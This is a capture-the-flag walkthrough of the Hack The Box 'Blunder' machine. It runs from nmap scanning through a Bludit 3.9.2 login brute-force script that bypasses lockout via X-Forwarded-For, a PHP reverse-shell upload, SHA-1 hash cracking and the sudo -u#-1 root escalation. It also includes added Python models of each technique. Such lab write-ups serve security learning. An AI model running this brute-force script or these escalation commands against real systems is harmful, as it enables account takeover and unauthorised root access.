NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 12:26 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Initiating Ping Scan at 12:26
Scanning 10.10.10.191 [4 ports]
Completed Ping Scan at 12:26, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:26
Scanning blunder.htb (10.10.10.191) [1000 ports]
Discovered open port 80/tcp on 10.10.10.191
Completed SYN Stealth Scan at 12:27, 27.74s elapsed (1000 total ports)
Initiating Service scan at 12:27
Scanning 1 service on blunder.htb (10.10.10.191)
Completed Service scan at 12:27, 7.31s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against blunder.htb (10.10.10.191)
Retrying OS detection (try #2) against blunder.htb (10.10.10.191)
Initiating Traceroute at 12:27
Completed Traceroute at 12:27, 0.59s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:27
Completed Parallel DNS resolution of 2 hosts. at 12:27, 0.34s elapsed
NSE: Script scanning 10.10.10.191.
Initiating NSE at 12:27
Completed NSE at 12:27, 17.17s elapsed
Initiating NSE at 12:27
Completed NSE at 12:27, 6.48s elapsed
Initiating NSE at 12:27
Completed NSE at 12:27, 0.00s elapsed
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.50s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Aruba Instant AP (ArubaOS 6.4.2.6) (88%), Linux 3.5 (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%), Asus RT-AC66U router (Linux 2.6) (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 124.799 days (since Tue Jan 28 17:17:54 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   519.77 ms 10.10.14.1
2   584.24 ms blunder.htb (10.10.10.191)

NSE: Script Post-scanning.
Initiating NSE at 12:27
Completed NSE at 12:27, 0.00s elapsed
Initiating NSE at 12:27
Completed NSE at 12:27, 0.00s elapsed
Initiating NSE at 12:27
Completed NSE at 12:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.04 seconds
           Raw packets sent: 2091 (95.524KB) | Rcvd: 102 (9.976KB)
PORT 80 ENUMERATION
Only port 80 is open (21/tcp is closed, everything else is filtered), so everything starts with the web server. The front page gave nothing useful, so after trying different directories manually I found that /admin works.
I tried guessing credentials on the login form, but nothing worked. The page source told me it is Bludit 3.9.2, so I searched for an exploit for that version and found this script:
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
But that script needs a username and a password wordlist.
So I used wfuzz to find further directories and files.
It found three files:
- robots.txt
- install.php
- todo.txt
From those (todo.txt) I got the username, fergus. For passwords I first tried rockyou.txt, but it is huge for an attack that needs one request per guess (each with a freshly fetched CSRF token) and gave no result in reasonable time. Since the machine is rated easy, I instead built a password list from the site's own pages with CeWL.
CeWL's output went into word.txt, and I modified the wordlist portion of the script to read from that file. That run found the password:
#!/usr/bin/env python3
# Bludit 3.9.2 brute-force mitigation bypass (based on rastating's script).
# Bludit counts failed logins per client IP, but takes that IP from the
# X-Forwarded-For header, so every guess is sent with a different value in
# that header and the lockout never triggers.
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = "fergus"
wordlist = []

# Read the CeWL-generated wordlist, one candidate per line
with open("word.txt", "r") as file:
    for line in file:
        wordlist.append(line.rstrip())

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # Each login attempt needs a fresh CSRF token from the form
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,   # unique per attempt: defeats the per-IP counter
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login redirects to the dashboard; a failure re-renders the form
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
fergus : RolandDeschain
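To show why the header trick above works, here is an added, offline model of the attack (written for this page, not code from the post or from Bludit): a CeWL-style word harvest from a constructed page, a login endpoint whose failed-attempt counter is keyed on the client IP, and a brute-force loop run once against the vulnerable behaviour (IP taken from X-Forwarded-For, as Bludit 3.9.2 does) and once against the hardened behaviour (IP taken from the socket peer only). The HTML, the credential, the remote address and the threshold are all constructed for the demo; the Login class is modelled on the bug description, not copied from Bludit's security.class.php.

```python
"""X-Forwarded-For lockout bypass in Bludit 3.9.2, as a runnable model.

Added example, not code from the page or from Bludit. The Login class is a
simplified model of Bludit's brute-force protection (a failed-attempt counter
keyed on the client IP, with the IP read from X-Forwarded-For when present).
The HTML, credential, remote address and threshold are constructed.
"""
import re

FAILURES_ALLOWED = 10   # constructed threshold (Bludit's default is also 10)

# Constructed stand-in for the blog pages the author fed to CeWL.
SAMPLE_HTML = """<html><body>
<h1>Blunder</h1><p>A blunder of interesting facts.</p>
<p>Stephen King wrote about Roland Deschain, the gunslinger, and his ka-tet.</p>
<p>Probably the most interesting fact is that RolandDeschain appears here.</p>
</body></html>"""

# Constructed credential store; the real one lives in bl-content/databases/users.php.
VALID_USERS = {"fergus": "RolandDeschain"}


def harvest_words(html, min_len=5):
    """CeWL-style harvest: drop tags, keep words of min_len+ chars, dedupe in order."""
    text = re.sub(r"<[^>]+>", " ", html)
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z][A-Za-z0-9-]+", text):
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)
    return words


class Login:
    """Login endpoint with a per-IP failure counter."""

    def __init__(self, trust_xff):
        self.trust_xff = trust_xff   # True models Bludit 3.9.2, False the hardened form
        self.failures = {}           # client ip -> failed attempts

    def client_ip(self, headers, remote_addr):
        # Vulnerable behaviour: an attacker-supplied header overrides the socket peer.
        if self.trust_xff and "X-Forwarded-For" in headers:
            return headers["X-Forwarded-For"]
        return remote_addr

    def attempt(self, username, password, headers, remote_addr="10.10.14.140"):
        ip = self.client_ip(headers, remote_addr)
        if self.failures.get(ip, 0) >= FAILURES_ALLOWED:
            return "locked"
        if VALID_USERS.get(username) == password:
            return "ok"
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return "fail"


def brute_force(app, username, wordlist, rotate_xff):
    """Try every word; with rotate_xff each guess carries a unique X-Forwarded-For.
    Returns (password found or None, number of guesses answered 'locked')."""
    locked = 0
    for guess in wordlist:
        headers = {"X-Forwarded-For": guess} if rotate_xff else {}
        result = app.attempt(username, guess, headers)
        if result == "ok":
            return guess, locked
        if result == "locked":
            locked += 1
    return None, locked


def demo():
    words = harvest_words(SAMPLE_HTML)
    vulnerable = brute_force(Login(trust_xff=True), "fergus", words, rotate_xff=True)
    hardened = brute_force(Login(trust_xff=False), "fergus", words, rotate_xff=True)
    return words, vulnerable, hardened


if __name__ == "__main__":
    words, vulnerable, hardened = demo()
    print(f"{len(words)} candidates harvested, e.g. {words[:5]}")
    print("XFF trusted (3.9.2), header rotated:", vulnerable)
    print("REMOTE_ADDR only (hardened):        ", hardened)
```

The correct word sits thirteenth in the harvested list. With the header trusted, every guess lands on a fresh counter and the password is found without a single lockout; with the counter keyed on the real peer address, the tenth failure locks 10.10.14.140 and the remaining guesses, the right one included, are refused.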
With that I got the Bludit dashboard.
Now let's look for an exploit that works from the authenticated dashboard:
There are two ways:
- Metasploit
- Manual file upload: Bludit 3.9.2's image upload accepts a PHP file and a directory traversal in the uuid parameter (CVE-2019-16113) places it where it is reachable (I got my shell using this …)
I don't know why Metasploit didn't work for me!!
It was showing an error like "UUID not found".
So I chose the manual way!!
I will not be explaining everything here, but you can see the main screenshots of the procedure I went through!!
It may happen that the exploit doesn't go through for you on the first try; with the screenshots above you can easily follow along.
Remember to listen on the port you put in the PHP reverse-shell script that you uploaded as an image in the procedure above:
root@liquid:~/Desktop/HTB/blunder# nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.10.14.140] from (UNKNOWN) [10.10.10.191] 36744
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:50:51 up 11 min,  1 user,  load average: 55.70, 58.31, 34.96
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
shaun    :0       :0               07:39   ?xdm?   9:10   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
But we are still www-data; we need a real user to read user.txt.
ESCALATION TO USER
In /etc/passwd we can see the following accounts:
shaun:x:1000:1000:blunder,,,:/home/shaun:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hugo:x:1001:1001:Hugo,1337,07,08,09:/home/hugo:/bin/bash
temp:x:1002:1002:,,,:/home/temp:/bin/bash
So there are three users with a login shell: shaun, hugo and temp!!
Looking around, I found two folders named bludit in /var/www.
Enumerating those folders,
I found Bludit's users database (bl-content/databases/users.php) with a password hash for the user hugo!!
It was not encrypted but hashed with SHA-1 (Bludit stores sha1 of the password plus a per-user salt, so it has to be cracked by guessing, not decrypted).
After cracking it I got this:
hugo : faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
Back in the www-data shell, switching to hugo with that password:
$ su hugo
Password: Password120
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
Yes, I have been using the plain, un-upgraded shell; I will upgrade it when going for root access.
After this we got our flag, user.txt.
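As an added example (written for this page, not Bludit's or the author's code), here is the check a practitioner would run against a copied users.php instead of pasting the hash into a web site: Bludit keeps users as JSON with a hex "password" field and a "salt" field and hashes as sha1(password . salt), so a wordlist is tried with the stored salt and, since a lookup that knows nothing about the salt still recovered hugo's password here, with no salt as well. The database below is constructed: hugo's hash is the one from this page paired with a made-up salt, the second user and the wordlist are invented.

```python
"""Crack Bludit user-database hashes from a wordlist.

Added example, not Bludit's or the page's code. Bludit stores users in
bl-content/databases/users.php as JSON with a hex "password" and a "salt"
and computes sha1(password . salt); that is a hash, not encryption, so it is
recovered by guessing. The database, salts and wordlist below are constructed.
"""
import hashlib
import json


def bludit_hash(password, salt=""):
    """Bludit's scheme: hex SHA-1 of the password followed by the salt."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


# Constructed users database in Bludit's JSON layout (the real file starts with
# a "<?php defined('BLUDIT') or die(...); ?>" guard line before the JSON).
USERS_DB = json.dumps({
    "hugo": {"nickname": "Hugo", "role": "author",
             "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",   # from the page
             "salt": "abcd1234"},                                      # constructed
    "wiki": {"nickname": "Wiki", "role": "author",                     # constructed
             "password": bludit_hash("Spring2020!", "jqxp"),
             "salt": "jqxp"},
})

WORDLIST = ["password", "Password1", "Spring2020!", "Password120", "hugo"]  # constructed


def load_users(users_php):
    """Accept either the bare JSON or the file contents with the PHP guard line."""
    body = users_php[users_php.index("{"):]
    return json.loads(body)


def crack_users(users_php, wordlist):
    """Return {username: password} for every hash matched by a candidate.
    Tries the stored salt first and then the bare hash: an entry whose hash an
    unsalted lookup recovers was evidently written without its salt."""
    found = {}
    for name, record in load_users(users_php).items():
        target = record["password"].lower()
        salt = record.get("salt", "")
        for candidate in wordlist:
            if target in (bludit_hash(candidate, salt), bludit_hash(candidate)):
                found[name] = candidate
                break
    return found


if __name__ == "__main__":
    for user, password in crack_users(USERS_DB, WORDLIST).items():
        print(f"{user} : {password}")
```

Point the loader at the copied file (users.php with its guard line is accepted) and a real wordlist; any user whose hash matches, salted or not, is printed in the same user : password form the post uses.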
GETTING ROOT ACCESS
After running the obvious command, sudo -l, we got this:
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
Which is easy, because I remember this privilege escalation (CVE-2019-14287) from practising on the TryHackMe platform. A rule of the form (ALL, !root) lets hugo run bash as any user except root, but sudo versions before 1.8.28 accept -1 (or 4294967295) as a user ID: it is not uid 0, so the !root check passes, yet setresuid() treats -1 as "leave unchanged", and sudo is already running as root at that point.
https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability
hugo@blunder:~$ sudo -u#-1 bash
sudo -u#-1 bash
root@blunder:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/root# cat root.txt
cat root.txt
865bc95ef711052189a2b557f6df593d
And there we got our root flag too!!
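To make the mechanism concrete, here is an added model of what sudo did with -u#-1 (written for this page; it is not sudo's parser and not the author's code). The vulnerable parser stores the number in a 32-bit uid_t, so -1 and 4294967295 both become (uid_t)-1; the (ALL, !root) policy only refuses uid 0, so it lets that through; and setresuid(2) treats (uid_t)-1 as "leave this id unchanged", which from sudo's root context means staying root. The fix in sudo 1.8.28 rejects those values at parse time. Only the user id is affected by the trick, which is why the id output above shows uid=0 alongside gid=1001(hugo). The last function performs the setresuid(-1,-1,-1) call on the host as an unprivileged live check of that kernel semantics.

```python
"""Why `sudo -u#-1 bash` ran as root (CVE-2019-14287), as a runnable model.

Added example, not sudo's code: the two parsers model the behaviour before
and after sudo 1.8.28, and uid_after_setresuid models the kernel rule that
(uid_t)-1 means 'no change'. Assumes a 32-bit uid_t, as on Linux.
"""
import os

UID_T_MAX = 2**32 - 1   # (uid_t)-1 == 4294967295 on Linux


def parse_runas_uid_vulnerable(spec):
    """Parse sudo's '#<n>' runas syntax the way sudo < 1.8.28 effectively did:
    the value is stored in a uid_t, so '#-1' and '#4294967295' both give
    (uid_t)-1 and are accepted as a target user."""
    if not spec.startswith("#"):
        raise ValueError("runas uid must look like '#<number>'")
    n = int(spec[1:], 10)
    if n < -1 or n > UID_T_MAX:
        raise ValueError("uid out of range")
    return n % (UID_T_MAX + 1)   # -1 wraps to 4294967295


def parse_runas_uid_fixed(spec):
    """sudo 1.8.28's fix: (uid_t)-1 is never a valid target user."""
    uid = parse_runas_uid_vulnerable(spec)
    if uid == UID_T_MAX:
        raise ValueError("uid -1 (4294967295) is reserved and not allowed")
    return uid


def all_but_root_allows(target_uid):
    """Policy check for '(ALL, !root) /bin/bash': any target user except uid 0."""
    return target_uid != 0


def uid_after_setresuid(target_uid, euid_before=0):
    """setresuid(2) semantics: an argument of (uid_t)-1 leaves that id unchanged.
    sudo performs the switch as root (euid 0), so 'unchanged' means root."""
    return euid_before if target_uid == UID_T_MAX else target_uid


def setresuid_minus_one_is_noop():
    """Live check of the same semantics on this host; needs no privilege.
    Returns None where os.setresuid is unavailable (non-Linux)."""
    if not hasattr(os, "setresuid"):
        return None
    before = os.getuid()
    os.setresuid(-1, -1, -1)   # every field 'unchanged'
    return os.getuid() == before


def trace(spec):
    """Walk 'sudo -u<spec> bash' through the vulnerable and the fixed parser."""
    uid = parse_runas_uid_vulnerable(spec)
    out = {
        "spec": spec,
        "parsed_uid": uid,
        "policy_allows": all_but_root_allows(uid),
        "resulting_uid": uid_after_setresuid(uid),
    }
    try:
        parse_runas_uid_fixed(spec)
        out["fixed_rejects"] = False
    except ValueError:
        out["fixed_rejects"] = True
    return out


if __name__ == "__main__":
    for spec in ("#-1", "#4294967295", "#1001"):
        print(trace(spec))
    print("setresuid(-1,-1,-1) left the uid unchanged:", setresuid_minus_one_is_noop())
```

Running it prints that "#-1" and "#4294967295" parse to 4294967295, pass the !root policy and leave the process at uid 0 under the old parser while the fixed parser rejects them, whereas "#1001" behaves the same under both.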
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE